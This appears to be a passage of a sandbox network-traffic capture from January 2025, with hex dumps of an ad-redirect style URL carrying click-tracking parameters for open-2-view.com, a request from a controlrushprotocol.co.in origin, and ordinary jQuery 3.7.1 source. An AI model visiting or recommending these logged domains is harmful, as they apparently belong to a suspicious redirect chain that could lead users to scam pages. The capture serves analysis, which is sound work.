2025-01-10 08:50:45 UTC	16384	IN	Data Raw: 72 43 37 41 78 4c 54 6d 42 6d 55 64 5a 6d 49 33 70 2b 65 4e 4e 65 63 7a 55 34 6a 2f 2f 2b 63 2b 74 74 4c 54 55 37 72 7a 7a 7a 69 61 4c 4b 4b 31 63 75 64 49 75 76 50 44 43 4a 68 6c 6e 37 52 64 6d 48 44 33 75 75 4f 4f 69 79 36 32 7a 4f 4e 70 37 37 37 33 58 4a 47 37 73 69 52 2f 38 34 41 64 32 35 4a 46 48 75 74 50 4a 35 74 6e 6e 67 37 55 64 72 72 33 32 32 74 67 6b 33 66 47 5a 5a 35 37 70 6c 72 61 2b 2b 2b 36 37 34 31 35 6e 4d 54 79 57 4c 43 44 65 59 59 63 64 46 6a 64 4f 75 6b 39 32 6d 45 42 67 4c 76 6b 35 63 2b 61 6b 4f 2f 2f 74 6e 68 37 35 56 68 41 42 45 52 41 42 45 57 67 2f 41 69 7a 4c 66 75 75 74 74 39 72 79 35 63 74 64 68 59 30 67 6d 44 74 33 72 73 32 63 4f 64 4f 74 38 49 6f 31 34 5a 68 6a 6a 6d 6d 53 41 56 59 2b 4a 61 78 65 76 64 71 74 58 73 72 69 61 50 Data Ascii: rC7AxLTmBmUdZmI3p+eNNeczU4j//+c+ttLTU7rzzziaLKK1cudIuvPDCJhln7RdmHD3uuOOiy62zONp7773XJG7siR/84Ad25JFHutPJ5tnng7Udrr322tgk3fGZZ57plra+++67415nMTyWLCDeYYcdFjdOuk92mEBgLvk5c+akO//tnh75VhABERABEWg/AizLfuutt9ry5ctdhY0gmDt3rs2cOdOt8Io14ZhjjmmSAVY+JaxevdqtXsriaP
2025-01-10 08:50:45 UTC	1807	IN	Data Raw: 48 6f 41 43 34 2d 32 41 74 4e 76 59 76 36 4d 43 26 74 31 3d 35 30 36 38 39 34 26 74 32 3d 32 38 35 31 35 36 30 26 74 73 69 64 3d 31 36 26 63 6c 69 63 6b 69 64 3d 63 75 30 64 75 70 30 68 75 62 63 63 37 33 64 72 36 33 74 67 26 64 6f 6d 61 69 6e 3d 6f 70 65 6e 2d 32 2d 76 69 65 77 2e 63 6f 6d 26 6c 70 5f 6b 65 79 3d 31 37 33 36 34 37 65 61 65 33 38 65 35 32 32 32 35 62 63 36 61 37 33 30 36 64 36 64 63 30 30 61 33 35 62 33 35 39 39 33 34 34 26 73 63 65 6e 61 72 69 6f 3d 32 26 69 6d 67 3d 31 26 72 65 74 72 79 3d 32 26 61 6c 6c 6f 77 65 64 3d 31 22 2c 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 73 73 55 72 6c 50 61 72 61 6d 73 3a 20 66 61 6c 73 65 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 68 6f 77 42 6c 6f 63 6b 42 61 6e 6e 65 72 3a 20 66 61 6c 73 Data Ascii: HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a7306d6dc00a35b3599344&scenario=2&img=1&retry=2&allowed=1", passUrlParams: false, showBlockBanner: fals

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:46 UTC	562	OUT	GET /jquery-3.7.1.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive Origin: https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:46 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 285314 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-45a82" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 1466372 Date: Fri, 10 Jan 2025 08:50:46 GMT X-Served-By: cache-lga21985-LGA, cache-ewr-kewr1740068-EWR X-Cache: HIT, HIT X-Cache-Hits: 771, 0 X-Timer: S1736499046.205045,VS0,VE1 Vary: Accept-Encoding
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 37 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 32 33 2d 30 38 2d 32 38 54 31 33 3a 33 37 5a 0a 20 2a 2f 0a 28 20 66 75 6e 63 74 69 6f 6e 28 20 67 6c 6f 62 61 6c 2c 20 66 61 63 74 6f 72 79 20 29 20 7b 0a 0a 09 22 75 73 Data Ascii: /! jQuery JavaScript Library v3.7.1 * https://jquery.com/ * * Copyright OpenJS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2023-08-28T13:37Z */( function( global, factory ) {"us
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 20 73 68 6f 75 6c 64 20 62 65 20 63 6f 6d 6d 6f 6e 0a 2f 2f 20 65 6e 6f 75 67 68 20 74 68 61 74 20 61 6c 6c 20 73 75 63 68 20 61 74 74 65 6d 70 74 73 20 61 72 65 20 67 75 61 72 64 65 64 20 69 6e 20 61 20 74 72 79 20 62 6c 6f 63 6b 2e 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 76 61 72 20 61 72 72 20 3d 20 5b 5d 3b 0a 0a 76 61 72 20 67 65 74 50 72 6f 74 6f 20 3d 20 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 0a 0a 76 61 72 20 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 3b 0a 0a 76 61 72 20 66 6c 61 74 20 3d 20 61 72 72 2e 66 6c 61 74 20 3f 20 66 75 6e 63 74 69 6f 6e 28 20 61 72 72 61 79 20 29 20 7b 0a 09 72 65 74 75 72 6e 20 61 72 72 2e 66 6c 61 74 2e 63 61 6c 6c 28 20 61 72 72 61 79 20 29 3b 0a 7d 20 3a 20 66 75 6e 63 74 Data Ascii: should be common// enough that all such attempts are guarded in a try block."use strict";var arr = [];var getProto = Object.getPrototypeOf;var slice = arr.slice;var flat = arr.flat ? function( array ) {return arr.flat.call( array );} : funct
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 09 74 79 70 65 3a 20 74 72 75 65 2c 0a 09 09 73 72 63 3a 20 74 72 75 65 2c 0a 09 09 6e 6f 6e 63 65 3a 20 74 72 75 65 2c 0a 09 09 6e 6f 4d 6f 64 75 6c 65 3a 20 74 72 75 65 0a 09 7d 3b 0a 0a 09 66 75 6e 63 74 69 6f 6e 20 44 4f 4d 45 76 61 6c 28 20 63 6f 64 65 2c 20 6e 6f 64 65 2c 20 64 6f 63 20 29 20 7b 0a 09 09 64 6f 63 20 3d 20 64 6f 63 20 7c 7c 20 64 6f 63 75 6d 65 6e 74 3b 0a 0a 09 09 76 61 72 20 69 2c 20 76 61 6c 2c 0a 09 09 09 73 63 72 69 70 74 20 3d 20 64 6f 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 20 22 73 63 72 69 70 74 22 20 29 3b 0a 0a 09 09 73 63 72 69 70 74 2e 74 65 78 74 20 3d 20 63 6f 64 65 3b 0a 09 09 69 66 20 28 20 6e 6f 64 65 20 29 20 7b 0a 09 09 09 66 6f 72 20 28 20 69 20 69 6e 20 70 72 65 73 65 72 76 65 64 53 63 72 69 70 74 41 74 Data Ascii: type: true,src: true,nonce: true,noModule: true};function DOMEval( code, node, doc ) {doc = doc \|\| document;var i, val,script = doc.createElement( "script" );script.text = code;if ( node ) {for ( i in preservedScriptAt
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 74 68 65 20 67 6c 6f 62 61 6c 0a 2f 2f 20 75 6e 67 75 61 72 64 65 64 20 69 6e 20 61 6e 6f 74 68 65 72 20 70 6c 61 63 65 2c 20 69 74 20 73 65 65 6d 73 20 73 61 66 65 72 20 74 6f 20 64 65 66 69 6e 65 20 67 6c 6f 62 61 6c 20 6f 6e 6c 79 20 66 6f 72 20 74 68 69 73 20 6d 6f 64 75 6c 65 0a 0a 0a 0a 76 61 72 20 76 65 72 73 69 6f 6e 20 3d 20 22 33 2e 37 2e 31 22 2c 0a 0a 09 72 68 74 6d 6c 53 75 66 66 69 78 20 3d 20 2f 48 54 4d 4c 24 2f 69 2c 0a 0a 09 2f 2f 20 44 65 66 69 6e 65 20 61 20 6c 6f 63 61 6c 20 63 6f 70 79 20 6f 66 20 6a 51 75 65 72 79 0a 09 6a 51 75 65 72 79 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 73 65 6c 65 63 74 6f 72 2c 20 63 6f 6e 74 65 78 74 20 29 20 7b 0a 0a 09 09 2f 2f 20 54 68 65 20 6a 51 75 65 72 79 20 6f 62 6a 65 63 74 20 69 73 20 61 63 74 75 Data Ascii: the global// unguarded in another place, it seems safer to define global only for this modulevar version = "3.7.1",rhtmlSuffix = /HTML$/i,// Define a local copy of jQueryjQuery = function( selector, context ) {// The jQuery object is actu
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 0a 09 09 72 65 74 75 72 6e 20 72 65 74 3b 0a 09 7d 2c 0a 0a 09 2f 2f 20 45 78 65 63 75 74 65 20 61 20 63 61 6c 6c 62 61 63 6b 20 66 6f 72 20 65 76 65 72 79 20 65 6c 65 6d 65 6e 74 20 69 6e 20 74 68 65 20 6d 61 74 63 68 65 64 20 73 65 74 2e 0a 09 65 61 63 68 3a 20 66 75 6e 63 74 69 6f 6e 28 20 63 61 6c 6c 62 61 63 6b 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 6a 51 75 65 72 79 2e 65 61 63 68 28 20 74 68 69 73 2c 20 63 61 6c 6c 62 61 63 6b 20 29 3b 0a 09 7d 2c 0a 0a 09 6d 61 70 3a 20 66 75 6e 63 74 69 6f 6e 28 20 63 61 6c 6c 62 61 63 6b 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 20 6a 51 75 65 72 79 2e 6d 61 70 28 20 74 68 69 73 2c 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 69 20 29 20 7b 0a 09 09 09 72 65 Data Ascii: return ret;},// Execute a callback for every element in the matched set.each: function( callback ) {return jQuery.each( this, callback );},map: function( callback ) {return this.pushStack( jQuery.map( this, function( elem, i ) {re
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 20 53 6b 69 70 20 74 68 65 20 62 6f 6f 6c 65 61 6e 20 61 6e 64 20 74 68 65 20 74 61 72 67 65 74 0a 09 09 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 20 69 20 5d 20 7c 7c 20 7b 7d 3b 0a 09 09 69 2b 2b 3b 0a 09 7d 0a 0a 09 2f 2f 20 48 61 6e 64 6c 65 20 63 61 73 65 20 77 68 65 6e 20 74 61 72 67 65 74 20 69 73 20 61 20 73 74 72 69 6e 67 20 6f 72 20 73 6f 6d 65 74 68 69 6e 67 20 28 70 6f 73 73 69 62 6c 65 20 69 6e 20 64 65 65 70 20 63 6f 70 79 29 0a 09 69 66 20 28 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 21 3d 3d 20 22 6f 62 6a 65 63 74 22 20 26 26 20 21 69 73 46 75 6e 63 74 69 6f 6e 28 20 74 61 72 67 65 74 20 29 20 29 20 7b 0a 09 09 74 61 72 67 65 74 20 3d 20 7b 7d 3b 0a 09 7d 0a 0a 09 2f 2f 20 45 78 74 65 6e 64 20 6a 51 75 65 72 79 20 69 74 Data Ascii: Skip the boolean and the targettarget = arguments[ i ] \|\| {};i++;}// Handle case when target is a string or something (possible in deep copy)if ( typeof target !== "object" && !isFunction( target ) ) {target = {};}// Extend jQuery it
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 52 65 74 75 72 6e 20 74 68 65 20 6d 6f 64 69 66 69 65 64 20 6f 62 6a 65 63 74 0a 09 72 65 74 75 72 6e 20 74 61 72 67 65 74 3b 0a 7d 3b 0a 0a 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 20 7b 0a 0a 09 2f 2f 20 55 6e 69 71 75 65 20 66 6f 72 20 65 61 63 68 20 63 6f 70 79 20 6f 66 20 6a 51 75 65 72 79 20 6f 6e 20 74 68 65 20 70 61 67 65 0a 09 65 78 70 61 6e 64 6f 3a 20 22 6a 51 75 65 72 79 22 20 2b 20 28 20 76 65 72 73 69 6f 6e 20 2b 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 29 2e 72 65 70 6c 61 63 65 28 20 2f 5c 44 2f 67 2c 20 22 22 20 29 2c 0a 0a 09 2f 2f 20 41 73 73 75 6d 65 20 6a 51 75 65 72 79 20 69 73 20 72 65 61 64 79 20 77 69 74 68 6f 75 74 20 74 68 65 20 72 65 61 64 79 20 6d 6f Data Ascii: }}}}// Return the modified objectreturn target;};jQuery.extend( {// Unique for each copy of jQuery on the pageexpando: "jQuery" + ( version + Math.random() ).replace( /\D/g, "" ),// Assume jQuery is ready without the ready mo
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 20 6f 62 6a 20 29 20 29 20 7b 0a 09 09 09 6c 65 6e 67 74 68 20 3d 20 6f 62 6a 2e 6c 65 6e 67 74 68 3b 0a 09 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 20 6f 62 6a 5b 20 69 20 5d 2c 20 69 2c 20 6f 62 6a 5b 20 69 20 5d 20 29 20 3d 3d 3d 20 66 61 6c 73 65 20 29 20 7b 0a 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 66 6f 72 20 28 20 69 20 69 6e 20 6f 62 6a 20 29 20 7b 0a 09 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 20 6f 62 6a 5b 20 69 20 5d 2c 20 69 2c 20 6f 62 6a 5b 20 69 20 5d 20 29 20 3d 3d 3d 20 66 61 6c 73 65 20 29 20 7b 0a 09 09 09 09 09 62 72 65 61 Data Ascii: obj ) ) {length = obj.length;for ( ; i < length; i++ ) {if ( callback.call( obj[ i ], i, obj[ i ] ) === false ) {break;}}} else {for ( i in obj ) {if ( callback.call( obj[ i ], i, obj[ i ] ) === false ) {brea
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 6c 65 6d 20 29 20 7b 0a 09 09 76 61 72 20 6e 61 6d 65 73 70 61 63 65 20 3d 20 65 6c 65 6d 20 26 26 20 65 6c 65 6d 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 0a 09 09 09 64 6f 63 45 6c 65 6d 20 3d 20 65 6c 65 6d 20 26 26 20 28 20 65 6c 65 6d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 7c 7c 20 65 6c 65 6d 20 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 0a 0a 09 09 2f 2f 20 41 73 73 75 6d 65 20 48 54 4d 4c 20 77 68 65 6e 20 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 20 64 6f 65 73 6e 27 74 20 79 65 74 20 65 78 69 73 74 2c 20 73 75 63 68 20 61 73 20 69 6e 73 69 64 65 0a 09 09 2f 2f 20 64 6f 63 75 6d 65 6e 74 20 66 72 61 67 6d 65 6e 74 73 2e 0a 09 09 72 65 74 75 72 6e 20 21 72 68 74 6d 6c 53 75 66 66 69 78 2e 74 65 73 74 28 20 6e 61 6d 65 73 70 61 Data Ascii: lem ) {var namespace = elem && elem.namespaceURI,docElem = elem && ( elem.ownerDocument \|\| elem ).documentElement;// Assume HTML when documentElement doesn't yet exist, such as inside// document fragments.return !rhtmlSuffix.test( namespa
2025-01-10 08:50:46 UTC	1378	IN	Data Raw: 66 20 28 20 76 61 6c 75 65 20 21 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 09 09 09 72 65 74 2e 70 75 73 68 28 20 76 61 6c 75 65 20 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 0a 09 09 2f 2f 20 47 6f 20 74 68 72 6f 75 67 68 20 65 76 65 72 79 20 6b 65 79 20 6f 6e 20 74 68 65 20 6f 62 6a 65 63 74 2c 0a 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 66 6f 72 20 28 20 69 20 69 6e 20 65 6c 65 6d 73 20 29 20 7b 0a 09 09 09 09 76 61 6c 75 65 20 3d 20 63 61 6c 6c 62 61 63 6b 28 20 65 6c 65 6d 73 5b 20 69 20 5d 2c 20 69 2c 20 61 72 67 20 29 3b 0a 0a 09 09 09 09 69 66 20 28 20 76 61 6c 75 65 20 21 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 09 09 09 72 65 74 2e 70 75 73 68 28 20 76 61 6c 75 65 20 29 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 0a 09 09 2f 2f 20 46 6c 61 74 Data Ascii: f ( value != null ) {ret.push( value );}}// Go through every key on the object,} else {for ( i in elems ) {value = callback( elems[ i ], i, arg );if ( value != null ) {ret.push( value );}}}// Flat